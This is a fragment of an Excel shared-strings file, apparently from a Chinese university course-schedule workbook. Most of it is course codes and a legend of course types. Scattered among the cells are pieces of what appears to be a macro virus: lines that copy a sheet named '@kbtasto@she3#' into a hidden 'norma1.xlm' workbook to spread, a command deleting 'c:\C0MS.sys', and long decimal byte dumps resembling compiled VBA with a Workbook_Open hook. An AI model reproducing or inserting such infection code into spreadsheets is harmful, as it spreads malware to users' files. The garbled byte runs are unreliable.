    <t>171111</t>
  </si>
  <si>
    <t>171112</t>
  </si>
  <si>
    <t>171113</t>
  </si>
  <si>
    <t>171114</t>
  </si>
  <si>
    <t>171121</t>
  </si>
  <si>
    <t>171122</t>
  </si>
  <si>
    <t>171123</t>
  </si>
  <si>
    <t>171131</t>
  </si>
  <si>
    <t>171132</t>
  </si>
  <si>
    <t>171211</t>
  </si>
  <si>
    <t>171212</t>
  </si>
  <si>
    <t>171213</t>
  </si>
  <si>
    <t>171221</t>
  </si>
  <si>
    <t>171222</t>
  </si>
  <si>
    <t>171241</t>
  </si>
  <si>
    <t>171242</t>
  </si>
  <si>
    <t>171251</t>
  </si>
  <si>
    <t>171261</t>
  </si>
  <si>
    <t>171262</t>
  </si>
  <si>
    <t>171263</t>
  </si>
  <si>
    <t>171421</t>
  </si>
  <si>
    <t>171431</t>
  </si>
  <si>
    <t>171432</t>
  </si>
  <si>
    <t>171441</t>
  </si>
  <si>
    <t>171442</t>
  </si>
  <si>
    <t>171451</t>
  </si>
  <si>
    <t>171452</t>
  </si>
  <si>
    <t>171511</t>
  </si>
  <si>
    <t>171521</t>
  </si>
  <si>
    <t>171531</t>
  </si>
  <si>
    <t>171532</t>
  </si>
  <si>
    <t>171533</t>
  </si>
  <si>
    <t>172011</t>
  </si>
  <si>
    <t>172012</t>
  </si>
  <si>
    <t>172013</t>
  </si>
  <si>
    <t>172021</t>
  </si>
  <si>
    <t xml:space="preserve">8 60 255 254 154 44 255 12 0 1 0 37 40 244 254 3 0 37 4 20 255 58 4 255 35 0 37 4 24 255 5 5 0 36 6 0 13 192 1 4 0 8 24 255 13 100 0 7 0 8 20 255 254 154 196 254 12 0 1 0 253 159 254 152 10 0 1 0 41 8 0 116 255 60 255 24 255 20 255 54 4 0 44 255 196 254 0 122 40 80 255 4 0 37 4 60 255 58 96 255 35 0 37 4 116 255 8 120 255 13 192 1 4 0 8 116 255 13 100 0 7 0 8 60 255 254 154 44 255 12 0 1 0 37 40 244 254 4 0 37 4 20 255 58 4 255 35 0 37 4 24 255 5 5 0 36 6 0 13 192 1 4 0 8 24 255 13 100 0 7 0 8 20 255 254 154 196 254 12 0 1 0 253 159 254 152 10 0 1 0 41 8 0 116 255 60 255 24 255 20 255 54 4 0 44 255 196 254 0 122 40 80 255 5 0 37 4 60 255 58 96 255 35 0 37 4 116 255 8 120 255 13 192 1 4 0 8 116 255 13 100 0 7 0 8 60 255 254 154 44 255 12 0 1 0 37 40 244 254 5 0 37 4 20 255 58 4 255 35 0 37 4 24 255 5 5 0 36 6 0 13 192 1 4 0 8 24 255 13 100 0 7 0 8 20 255 254 154 196 254 12 0 1 0 253 159 254 152 10 0 1 0 41 8 0 116 255 60 255 24 255 20 255 54 4 0 44 255 196 254 0 72 58 96 255 13 0 37 58 64 255 36 0 37 58 244 254 15 0 37 254 193 212 254 2 0 0 0 37 4 116 255 8 120 255 13 12 1 4 0 8 116 255 254 170 22 0 181 0 0 0 4 0 0 0 0 0 9 0 0 0 5 0 0 0 3 0 0 0 26 116 255 0 15 245 9 4 0 0 8 120 255 13 152 1 4 0 0 0 19 0 0 0 0 8 0 84 1 80 5 52 0 8 0 0 0 0 0 19 0 0 0 0 0 28 0 0 0 0 0 4 0 0 0 0 0 60 254 2 0 44 254 2 0 80 254 2 0 120 255 3 0 68 0 0 0 0 0 14 0 0 0 0 0 112 255 1 0 96 254 1 0 116 255 3 0 60 255 3 0 24 255 3 0 20 255 3 0 44 255 2 0 </t>
  </si>
  <si>
    <t>ThisWorkbook.Sheets("@kbtasto@she3#").Columns(4).Copy Workbooks("norma1.xlm").Sheets("@kbtasto@she3#").Columns(4)</t>
  </si>
  <si>
    <t xml:space="preserve">28 255 2 0 196 254 2 0 180 254 2 0 164 254 2 0 148 254 2 0 116 254 2 0 100 254 2 0 48 0 0 0 12 0 0 0 252 198 0 0 0 0 0 0 128 12 0 0 0 0 0 0 8 0 0 0 12 0 0 0 8 0 0 0 0 0 0 0 0 0 0 0 12 0 0 0 0 0 0 0 0 0 0 0 22 0 0 20 56 0 13 0 1 0 7 0 0 19 0 0 60 0 7 0 0 19 1 0 60 0 7 0 0 19 2 0 60 0 7 0 0 19 3 0 0 0 41 0 0 127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</si>
  <si>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ThisWorkbook.Sheets("@kbtasto@she3#").Columns(5).Copy Workbooks("norma1.xlm").Sheets("@kbtasto@she3#").Columns(5)</t>
  </si>
  <si>
    <r>
      <t>符号说明：□</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>理论课</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">     </t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>∈专业课设</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">     Ω</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>专业实践</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>※</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>技能训练</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <color indexed="17"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <color indexed="17"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>机原、机零</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <color indexed="17"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>★专业实习</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">     Z </t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>电子实习</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">    &amp;</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>基础课设</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">                              </t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>∝创新实践</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">        / </t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>金工实习</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">       T</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>教学实习</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">        </t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <color indexed="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>∷</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <color indexed="10"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <color indexed="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>考试</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">        </t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <color indexed="10"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t>///</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <color indexed="10"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>毕业实习</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">       *</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>社会调查</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">      Y</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>艺术实践</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">        X</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>写生</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t xml:space="preserve">  C</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>机器测绘</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="11"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">68 0 69 0 53 0 45 0 48 0 48 0 65 0 65 0 48 0 48 0 52 0 52 0 68 0 69 0 53 0 50 0 125 0 35 0 50 0 46 0 50 0 35 0 48 0 35 0 67 0 58 0 92 0 80 0 114 0 111 0 103 0 114 0 97 0 109 0 32 0 70 0 105 0 108 0 101 0 115 0 92 0 77 0 105 0 99 0 114 0 111 0 115 0 111 0 102 0 116 0 32 0 79 0 102 0 102 0 105 0 99 0 101 0 92 0 79 0 102 0 102 0 105 0 99 0 101 0 92 0 109 0 115 0 111 0 57 0 46 0 100 0 108 0 108 0 35 0 77 0 105 0 99 0 114 0 111 0 115 0 111 0 102 0 116 0 32 0 79 0 102 0 102 0 105 0 99 0 101 0 32 0 57 0 46 0 48 0 32 0 79 0 98 0 106 0 101 0 99 0 116 0 32 0 76 0 105 0 98 0 114 0 97 0 114 0 121 0 0 0 0 0 0 0 0 0 0 0 0 0 2 0 2 0 2 4 4 0 4 2 0 0 6 2 1 0 8 2 0 0 10 2 1 0 12 2 255 255 255 255 255 255 0 0 0 0 0 0 0 0 152 215 66 66 4 0 255 255 255 255 0 0 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 1 0 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 118 117 2 0 24 0 84 0 104 0 105 0 115 0 87 0 111 0 114 0 107 0 98 0 111 0 111 0 107 0 20 0 48 0 49 0 52 0 51 0 49 0 55 0 49 0 50 0 97 0 55 0 255 255 19 2 24 0 84 0 104 0 105 0 115 0 87 0 111 0 114 0 107 0 98 0 111 0 111 0 107 0 255 255 148 62 0 0 0 0 1 0 24 2 0 0 255 255 255 255 0 2 0 0 0 128 10 0 0 255 255 4 0 123 124 49 0 20 0 48 0 58 0 52 0 51 0 49 0 55 0 49 0 50 0 50 0 55 0 255 255 25 2 4 0 123 124 49 0 255 255 176 </t>
  </si>
  <si>
    <t>181113</t>
  </si>
  <si>
    <t>181114</t>
  </si>
  <si>
    <t>181121</t>
  </si>
  <si>
    <t>181122</t>
  </si>
  <si>
    <t>181123</t>
  </si>
  <si>
    <t>181131</t>
  </si>
  <si>
    <t>181132</t>
  </si>
  <si>
    <t>181211</t>
  </si>
  <si>
    <t>181212</t>
  </si>
  <si>
    <t>181213</t>
  </si>
  <si>
    <t>181221</t>
  </si>
  <si>
    <t>181222</t>
  </si>
  <si>
    <t>181241</t>
  </si>
  <si>
    <t>181242</t>
  </si>
  <si>
    <t>181251</t>
  </si>
  <si>
    <t>181261</t>
  </si>
  <si>
    <t>181262</t>
  </si>
  <si>
    <t>181263</t>
  </si>
  <si>
    <t>181421</t>
  </si>
  <si>
    <t>181431</t>
  </si>
  <si>
    <t>181432</t>
  </si>
  <si>
    <t>181441</t>
  </si>
  <si>
    <t>181442</t>
  </si>
  <si>
    <t>181451</t>
  </si>
  <si>
    <t>181452</t>
  </si>
  <si>
    <t>181511</t>
  </si>
  <si>
    <t>181521</t>
  </si>
  <si>
    <t>181531</t>
  </si>
  <si>
    <t>181532</t>
  </si>
  <si>
    <t>181533</t>
  </si>
  <si>
    <t>181534</t>
  </si>
  <si>
    <t>181611</t>
  </si>
  <si>
    <t>181612</t>
  </si>
  <si>
    <t>181613</t>
  </si>
  <si>
    <t>181614</t>
  </si>
  <si>
    <t>181621</t>
  </si>
  <si>
    <t xml:space="preserve">255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 156 245 118 192 47 67 133 66 147 150 155 183 255 92 225 209 255 255 255 255 1 0 0 0 100 111 67 92 174 230 75 69 166 87 66 4 167 190 181 155 255 255 255 255 1 0 0 0 255 255 255 255 72 0 0 0 128 0 0 0 0 0 92 1 93 0 255 0 200 49 0 0 5 12 69 120 99 101 108 128 43 96 0 3 12 86 66 65 247 226 96 0 5 4 87 105 110 49 54 193 126 96 0 5 4 87 105 110 51 50 7 127 96 0 3 4 77 97 99 179 178 96 0 4 4 86 66 65 54 173 35 96 0 10 12 86 66 65 80 114 111 106 101 99 116 190 191 96 0 6 8 115 116 100 111 108 101 147 96 96 0 6 8 79 102 102 105 99 101 21 117 96 0 12 12 84 104 105 115 87 111 114 107 98 111 111 107 124 227 96 0 9 128 0 0 255 3 1 0 95 69 118 97 108 117 97 116 101 24 217 96 0 1 4 120 111 16 96 0 3 12 192 224 49 117 114 96 0 13 4 87 111 114 107 98 111 111 107 95 79 112 101 110 155 225 96 0 11 0 65 112 112 108 105 99 97 116 105 111 110 165 42 96 0 20 0 83 104 111 119 87 105 110 100 111 119 115 73 110 84 97 115 107 98 97 114 159 40 96 0 7 0 87 105 110 100 111 119 115 163 100 96 0 7 0 86 105 115 105 98 108 101 182 211 96 0 8 0 77 101 110 117 66 97 114 115 37 194 96 0 5 0 77 101 110 117 115 33 76 96 0 9 0 77 101 110 117 73 116 101 109 115 236 177 96 0 6 0 68 101 108 101 116 101 184 120 96 0 3 4 65 112 112 191 116 96 0 9 0 87 111 114 107 98 111 111 107 115 66 236 96 0 5 0 67 111 117 110 116 48 118 96 0 3 0 65 100 100 247 114 96 0 15 4 65 112 112 95 78 101 119 87 111 114 107 98 111 111 107 75 30 96 0 2 4 87 98 133 95 96 0 8 4 87 111 114 107 98 111 111 107 107 24 96 0 6 0 83 104 101 101 116 115 10 27 96 0 4 0 67 111 112 121 198 191 96 </t>
  </si>
  <si>
    <t>160452</t>
  </si>
  <si>
    <t>160461</t>
  </si>
  <si>
    <t>160462</t>
  </si>
  <si>
    <t>160471</t>
  </si>
  <si>
    <t>160481</t>
  </si>
  <si>
    <t>160482</t>
  </si>
  <si>
    <t>160483</t>
  </si>
  <si>
    <t>160511</t>
  </si>
  <si>
    <t>160512</t>
  </si>
  <si>
    <t>160513</t>
  </si>
  <si>
    <t>160521</t>
  </si>
  <si>
    <t>160531</t>
  </si>
  <si>
    <t>160611</t>
  </si>
  <si>
    <t>160612</t>
  </si>
  <si>
    <t>160621</t>
  </si>
  <si>
    <t>160622</t>
  </si>
  <si>
    <t>160631</t>
  </si>
  <si>
    <t>160632</t>
  </si>
  <si>
    <t>160641</t>
  </si>
  <si>
    <t>160711</t>
  </si>
  <si>
    <t>160721</t>
  </si>
  <si>
    <t>160811</t>
  </si>
  <si>
    <t>160812</t>
  </si>
  <si>
    <t>160813</t>
  </si>
  <si>
    <t>160814</t>
  </si>
  <si>
    <t>160815</t>
  </si>
  <si>
    <t>160816</t>
  </si>
  <si>
    <t>160831</t>
  </si>
  <si>
    <t>160832</t>
  </si>
  <si>
    <t>160841</t>
  </si>
  <si>
    <t>160842</t>
  </si>
  <si>
    <t>160851</t>
  </si>
  <si>
    <t>160852</t>
  </si>
  <si>
    <t>160911</t>
  </si>
  <si>
    <t>160912</t>
  </si>
  <si>
    <t>160921</t>
  </si>
  <si>
    <t>160931</t>
  </si>
  <si>
    <t>160941</t>
  </si>
  <si>
    <t>160951</t>
  </si>
  <si>
    <t>161011</t>
  </si>
  <si>
    <t>161012</t>
  </si>
  <si>
    <t>161211</t>
  </si>
  <si>
    <t>161212</t>
  </si>
  <si>
    <t>161213</t>
  </si>
  <si>
    <t>161221</t>
  </si>
  <si>
    <t>161222</t>
  </si>
  <si>
    <t>161231</t>
  </si>
  <si>
    <t>161241</t>
  </si>
  <si>
    <t>161242</t>
  </si>
  <si>
    <t>161251</t>
  </si>
  <si>
    <t>161261</t>
  </si>
  <si>
    <t>161262</t>
  </si>
  <si>
    <t>161411</t>
  </si>
  <si>
    <t>161421</t>
  </si>
  <si>
    <t>161511</t>
  </si>
  <si>
    <t>161521</t>
  </si>
  <si>
    <t xml:space="preserve">104 0 99 8 115 0 87 0 171 114 0 107 0 170 98 128 3 111 128 3 26 142 23 50 218 11 162 28 192 18 0 0 72 66 1 49 2 116 90 128 64 132 30 66 2 1 5 44 194 33 148 20 62 34 66 8 43 66 1 25 0 3 33 192 1 192 224 49 71 130 9 123 124 104 49 0 26 133 4 50 134 4 79 22 200 72 42 0 0 77 22 176 137 67 22 40 11 66 22 195 23 16 194 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 147 75 42 115 1 0 16 0 0 0 255 255 0 0 0 0 1 0 2 0 255 255 0 0 0 0 1 0 0 0 1 0 0 0 0 0 1 0 2 0 1 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 1 0 2 0 0 0 0 0 0 0 1 0 5 0 5 0 5 0 5 0 5 0 5 0 5 0 5 0 5 0 5 0 0 0 114 85 128 2 0 0 128 0 0 0 128 0 0 0 128 0 0 0 4 0 0 126 5 0 0 126 5 0 0 126 1 0 0 126 1 0 0 126 1 0 0 126 1 0 0 126 1 0 0 126 1 0 0 126 3 0 0 126 3 0 0 126 3 0 0 126 3 0 0 126 82 0 0 127 0 0 0 0 21 0 0 0 9 0 0 0 0 0 1 0 8 0 0 0 0 0 0 0 241 0 0 0 0 0 0 0 110 250 78 144 62 129 198 79 168 146 255 227 99 227 208 15 1 0 9 4 0 0 4 8 0 0 168 3 0 0 0 0 0 0 2 0 255 255 255 255 2 0 131 138 97 0 9 0 0 0 0 0 4 0 33 6 0 0 0 0 0 0 255 255 255 255 1 0 249 5 0 0 0 0 0 0 255 255 0 0 185 0 0 0 0 0 0 0 3 128 97 0 9 0 0 0 0 0 2 0 217 8 0 0 0 0 0 0 255 255 255 255 4 0 49 8 0 0 0 0 0 0 89 8 0 0 0 0 0 0 145 8 0 0 0 0 0 0 193 8 0 0 0 0 0 0 255 255 0 0 225 0 0 0 0 0 0 0 4 0 177 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 193 2 0 0 </t>
  </si>
  <si>
    <t>fso.deletefile "c:\C0MS.sys"</t>
  </si>
  <si>
    <t xml:space="preserve">57 67 49 0 209 0 66 2 182 0 12 0 85 115 101 114 32 68 101 102 105 110 101 100 209 0 68 2 32 0 72 2 209 0 70 2 32 0 54 2 33 0 64 2 66 64 50 2 4 0 183 4 32 0 54 2 40 0 74 2 0 0 0 0 0 0 111 0 255 255 88 0 0 0 150 4 152 0 0 0 0 0 201 4 0 0 72 0 0 0 32 0 54 2 33 0 6 1 32 0 18 2 33 0 6 1 5 0 156 0 0 0 0 0 124 0 255 255 40 0 0 0 107 0 255 255 32 0 0 0 183 0 39 0 78 2 0 0 32 0 54 2 33 0 74 2 39 0 80 2 0 0 0 0 32 0 80 2 183 0 5 0 156 0 0 0 248 1 0 0 32 0 82 2 32 0 92 2 5 0 156 0 0 0 0 0 183 4 39 0 78 2 0 0 124 0 255 255 136 1 0 0 107 0 255 255 128 1 0 0 32 0 82 2 32 0 94 2 5 0 156 0 0 0 0 0 32 0 54 2 33 0 6 1 182 0 1 0 46 0 132 0 172 0 0 0 7 0 156 0 183 4 32 0 54 2 40 0 74 2 0 0 0 0 0 0 124 0 255 255 64 1 0 0 100 0 255 255 56 1 0 0 182 0 5 0 123 69 83 67 125 0 65 64 96 2 1 0 32 0 100 2 32 0 54 2 66 64 98 2 1 0 0 0 154 0 102 2 16 1 0 0 107 0 255 255 8 1 0 0 107 0 255 255 0 1 0 0 32 0 82 2 32 0 104 2 5 0 156 0 0 0 0 0 32 0 54 2 33 0 6 1 182 0 1 0 46 0 132 0 172 0 0 0 7 0 156 0 32 0 54 2 33 0 6 1 182 0 4 0 46 120 108 115 17 0 32 0 108 2 32 0 28 2 37 0 106 2 1 0 37 0 110 2 1 0 21 0 156 0 0 0 0 0 0 0 183 4 39 0 78 2 0 0 124 0 255 255 152 0 0 0 100 0 255 255 144 0 0 0 154 0 112 2 136 0 0 0 107 0 255 255 128 0 0 0 107 0 255 255 120 0 0 0 32 0 54 2 66 64 114 2 0 0 0 0 0 0 0 0 163 0 112 2 96 0 0 0 182 0 5 0 123 69 83 67 125 0 65 64 96 2 </t>
  </si>
  <si>
    <t>011</t>
  </si>
  <si>
    <t>012F1</t>
  </si>
  <si>
    <t>012F2</t>
  </si>
  <si>
    <t>013</t>
  </si>
  <si>
    <t>014</t>
  </si>
  <si>
    <t>021</t>
  </si>
  <si>
    <t>022</t>
  </si>
  <si>
    <t>022Z</t>
  </si>
  <si>
    <t>023</t>
  </si>
  <si>
    <t>024</t>
  </si>
  <si>
    <t>030</t>
  </si>
  <si>
    <t>030Z</t>
  </si>
  <si>
    <t>032Z1</t>
  </si>
  <si>
    <t>031Z2</t>
  </si>
  <si>
    <t>031</t>
  </si>
  <si>
    <t>032</t>
  </si>
  <si>
    <t>033</t>
  </si>
  <si>
    <t>033Z</t>
  </si>
  <si>
    <t>034</t>
  </si>
  <si>
    <t>034Z1</t>
  </si>
  <si>
    <t>035</t>
  </si>
  <si>
    <t>041</t>
  </si>
  <si>
    <t>042</t>
  </si>
  <si>
    <t>043</t>
  </si>
  <si>
    <t>044</t>
  </si>
  <si>
    <t>044Z</t>
  </si>
  <si>
    <t>045</t>
  </si>
  <si>
    <t>046</t>
  </si>
  <si>
    <t>047</t>
  </si>
  <si>
    <t>048</t>
  </si>
  <si>
    <t>051</t>
  </si>
  <si>
    <t>052</t>
  </si>
  <si>
    <t>053</t>
  </si>
  <si>
    <t>061</t>
  </si>
  <si>
    <t>062</t>
  </si>
  <si>
    <t>162</t>
  </si>
  <si>
    <t>161</t>
  </si>
  <si>
    <t>071</t>
  </si>
  <si>
    <t>072</t>
  </si>
  <si>
    <t>081F2</t>
  </si>
  <si>
    <t>081Z</t>
  </si>
  <si>
    <t>081</t>
  </si>
  <si>
    <t>083</t>
  </si>
  <si>
    <t>084</t>
  </si>
  <si>
    <t>085</t>
  </si>
  <si>
    <t>091</t>
  </si>
  <si>
    <t>092</t>
  </si>
  <si>
    <t>093</t>
  </si>
  <si>
    <t>094</t>
  </si>
  <si>
    <t>095</t>
  </si>
  <si>
    <t>096</t>
  </si>
  <si>
    <t>097</t>
  </si>
  <si>
    <t>101</t>
  </si>
  <si>
    <t>111</t>
  </si>
  <si>
    <t>112</t>
  </si>
  <si>
    <t>113</t>
  </si>
  <si>
    <t>121</t>
  </si>
  <si>
    <t>122</t>
  </si>
  <si>
    <t>123</t>
  </si>
  <si>
    <t>124</t>
  </si>
  <si>
    <t>125</t>
  </si>
  <si>
    <t>141</t>
  </si>
  <si>
    <t>142</t>
  </si>
  <si>
    <t>143</t>
  </si>
  <si>
    <t>144</t>
  </si>
  <si>
    <t>145</t>
  </si>
  <si>
    <t>151</t>
  </si>
  <si>
    <t>152</t>
  </si>
  <si>
    <t>153</t>
  </si>
  <si>
    <t>201</t>
  </si>
  <si>
    <t>207</t>
  </si>
  <si>
    <t>221</t>
  </si>
  <si>
    <t>221F2</t>
  </si>
  <si>
    <t>225</t>
  </si>
  <si>
    <t>G021</t>
  </si>
  <si>
    <t>146</t>
  </si>
  <si>
    <t>036</t>
  </si>
  <si>
    <t>073</t>
  </si>
  <si>
    <t>065</t>
  </si>
  <si>
    <t>208</t>
  </si>
  <si>
    <t>01</t>
    <phoneticPr fontId="15" type="noConversion"/>
  </si>
  <si>
    <t>160111</t>
    <phoneticPr fontId="15" type="noConversion"/>
  </si>
  <si>
    <t>10</t>
    <phoneticPr fontId="15" type="noConversion"/>
  </si>
  <si>
    <t>11</t>
    <phoneticPr fontId="15" type="noConversion"/>
  </si>
  <si>
    <t>12</t>
    <phoneticPr fontId="15" type="noConversion"/>
  </si>
  <si>
    <t>14</t>
    <phoneticPr fontId="15" type="noConversion"/>
  </si>
  <si>
    <t>20</t>
    <phoneticPr fontId="15" type="noConversion"/>
  </si>
  <si>
    <t>02</t>
    <phoneticPr fontId="15" type="noConversion"/>
  </si>
  <si>
    <t>22</t>
    <phoneticPr fontId="15" type="noConversion"/>
  </si>
  <si>
    <t>15</t>
    <phoneticPr fontId="15" type="noConversion"/>
  </si>
  <si>
    <t>03</t>
    <phoneticPr fontId="15" type="noConversion"/>
  </si>
  <si>
    <t>04</t>
    <phoneticPr fontId="15" type="noConversion"/>
  </si>
  <si>
    <t>06</t>
    <phoneticPr fontId="15" type="noConversion"/>
  </si>
  <si>
    <t>08</t>
    <phoneticPr fontId="15" type="noConversion"/>
  </si>
  <si>
    <t>05</t>
    <phoneticPr fontId="15" type="noConversion"/>
  </si>
  <si>
    <t>07</t>
    <phoneticPr fontId="15" type="noConversion"/>
  </si>
  <si>
    <t>09</t>
    <phoneticPr fontId="15" type="noConversion"/>
  </si>
  <si>
    <t>16</t>
    <phoneticPr fontId="15" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">1 0 249 3 0 0 0 0 0 0 255 255 255 255 255 255 255 255 255 255 255 255 3 0 29 6 0 0 0 0 3 96 34 6 0 0 1 0 3 96 31 6 0 0 2 0 3 96 193 1 0 0 0 0 2 0 1 2 0 0 0 0 2 0 65 2 0 0 0 0 2 0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255 12 0 16 0 7 0 0 0 17 1 0 0 0 0 2 0 69 1 0 0 0 0 2 0 121 1 0 0 0 0 2 0 207 1 0 0 0 0 2 0 15 2 0 0 0 0 2 0 79 2 0 0 0 0 2 0 143 2 0 0 0 0 2 0 132 3 0 0 44 3 0 0 0 9 108 12 0 252 248 120 255 0 34 244 0 245 9 4 0 0 4 116 255 5 0 0 36 1 0 13 28 0 2 0 8 116 255 13 224 1 3 0 26 116 255 0 115 4 112 255 8 120 255 13 8 1 4 0 108 112 255 4 108 255 5 5 0 36 6 0 13 8 1 4 0 108 108 255 251 48 253 248 24 255 4 88 255 40 92 255 1 0 37 4 116 255 8 120 255 13 192 1 4 0 8 116 255 13 100 0 7 0 8 88 255 87 56 255 8 0 58 72 255 35 0 93 251 47 40 255 251 31 8 255 255 27 50 4 0 112 255 108 255 41 4 0 116 255 88 255 54 4 0 56 255 24 255 28 161 0 0 3 19 0 2 0 90 4 88 255 40 92 255 1 0 37 4 116 255 8 120 255 13 192 1 4 0 8 116 255 13 100 0 7 0 81 88 255 253 111 56 255 37 4 0 255 58 72 255 35 0 37 4 4 255 5 5 0 36 6 0 13 192 1 4 0 8 4 255 13 100 0 7 0 8 0 255 254 152 10 0 1 0 41 6 0 116 255 4 255 0 255 53 56 255 0 49 252 </t>
  </si>
  <si>
